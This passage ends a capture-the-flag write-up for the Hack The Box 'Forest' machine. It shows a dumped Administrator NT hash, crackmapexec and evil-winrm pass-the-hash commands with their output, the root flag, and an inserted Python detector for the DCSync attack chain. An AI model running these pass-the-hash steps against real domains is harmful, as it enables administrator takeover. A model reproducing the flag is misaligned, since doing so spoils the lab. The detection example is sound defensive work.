The hash we are interested in is the "Administrator" user's:
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
We can see that we also have the NT hash on its own (the last hash field of the line):
32693b11e6aa90eb43d32c72a07ceea6
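From the defender's side, as an added example (not from the write-up): the detection logic below runs over constructed Security events reduced to the fields a SIEM extracts (4720 user created, 4756 member added to a universal group, 5136 domain nTSecurityDescriptor changed, 4662 replication rights exercised) and flags each step of the chain used above. The event records, the FOREST$ allow-list and the watched group names are assumptions of the example; the replication-right GUIDs are the real Active Directory control-access-right GUIDs.

```python
"""Detection logic for the user-creation -> group-add -> WriteDacl -> DCSync
chain, run over CONSTRUCTED Windows Security events (dicts holding the fields
a SIEM would extract).  Nothing below is real log data from the target."""
import re

# Control-access-right GUIDs that grant directory replication (DCSync).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
WATCHED_GROUPS = {"Exchange Windows Permissions", "Account Operators", "Domain Admins"}
DOMAIN_DN = "DC=htb,DC=local"
# Domain controllers replicate legitimately; anything else using replication
# rights is suspect.  FOREST$ is the DC in this lab (assumed allow-list).
DC_ACCOUNTS = {"FOREST$"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to global/local/universal group
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

# Constructed events mirroring the write-up's steps, plus two benign ones.
CONSTRUCTED_EVENTS = [
    {"EventID": 4720, "SubjectUserName": "svc-alfresco", "TargetUserName": "t0mz"},
    {"EventID": 4756, "SubjectUserName": "svc-alfresco",
     "MemberName": "CN=t0mz,CN=Users,DC=htb,DC=local",
     "TargetUserName": "Exchange Windows Permissions"},
    {"EventID": 5136, "SubjectUserName": "t0mz", "ObjectDN": DOMAIN_DN,
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "t0mz",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # benign: the DC itself replicating
    {"EventID": 4662, "SubjectUserName": "FOREST$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # benign: an unrelated extended right (Certificate-Enrollment)
    {"EventID": 4662, "SubjectUserName": "andy",
     "Properties": "{0e10c968-78fb-11d2-90d4-00c04f79dc55}"},
]


def _cn(dn):
    """First CN= component of a DN: 'CN=t0mz,CN=Users,...' -> 't0mz'."""
    m = re.match(r"CN=([^,]+)", dn, re.I)
    return m.group(1) if m else dn


def detect(events, dc_accounts=DC_ACCOUNTS):
    """Return a list of alert dicts.  User creations are remembered so that a
    later privileged-group add of a freshly created account is tied back to
    its creator, which is the pattern this write-up follows."""
    alerts, created_by = [], {}
    for e in events:
        eid, actor = e["EventID"], e["SubjectUserName"]
        if eid == 4720:
            created_by[e["TargetUserName"]] = actor
        elif eid in GROUP_ADD_EVENTS and e["TargetUserName"] in WATCHED_GROUPS:
            member = _cn(e["MemberName"])
            alert = {"rule": "privileged-group-add", "actor": actor,
                     "detail": f"{member} -> {e['TargetUserName']}"}
            if member in created_by:
                alert["chain"] = f"{member} was created by {created_by[member]}"
            alerts.append(alert)
        elif (eid == 5136 and e["ObjectDN"] == DOMAIN_DN
              and e["AttributeLDAPDisplayName"] == "nTSecurityDescriptor"):
            alerts.append({"rule": "domain-acl-modified", "actor": actor,
                           "detail": DOMAIN_DN})
        elif eid == 4662 and actor not in dc_accounts:
            hits = [REPL_RIGHTS[g] for g in GUID_RE.findall(e["Properties"].lower())
                    if g in REPL_RIGHTS]
            if hits:
                alerts.append({"rule": "dcsync", "actor": actor,
                               "detail": ", ".join(hits)})
    return alerts


if __name__ == "__main__":
    for alert in detect(CONSTRUCTED_EVENTS):
        print(alert)
```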
3.4 Pass-The-Hash
Now we are going to perform a Pass-The-Hash with the Administrator user's NT hash. First we verify whether we can log in through "evil-winrm" with that hash; for that we use the "crackmapexec" tool:
crackmapexec winrm 10.10.10.161 -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# crackmapexec winrm 10.10.10.161 -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'
SMB 10.10.10.161 5985 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
HTTP 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.10.161 5985 FOREST [+] htb.local\Administrator:32693b11e6aa90eb43d32c72a07ceea6 (Pwn3d!)
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#
(Remember to use the -H parameter and not -p, since we are specifying the hash, not the password)
User: Administrator
NT hash: 32693b11e6aa90eb43d32c72a07ceea6
It tells us the hash is correct, so right now we could log in with "evil-winrm" using this NT hash, and this is where pass-the-hash comes in: instead of passing evil-winrm the password as a parameter, we pass it the NT hash with the -H parameter:
evil-winrm -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6' -i 10.10.10.161
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# evil-winrm -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6' -i 10.10.10.161
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
3.5 Obtaining the root flag
The root flag is located at the absolute path "C:\Users\Administrator\Desktop\root.txt":
*Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:\Users\Administrator\Desktop\root.txt"
1b7e7fefc9f30bf92edc3df2855856cd
*Evil-WinRM* PS C:\Users\Administrator\Documents>
With this, we conclude the "Forest" machine from Hack The Box.
I hope this write-up was helpful :)
If you had any trouble solving it, don't forget to contact me on my social networks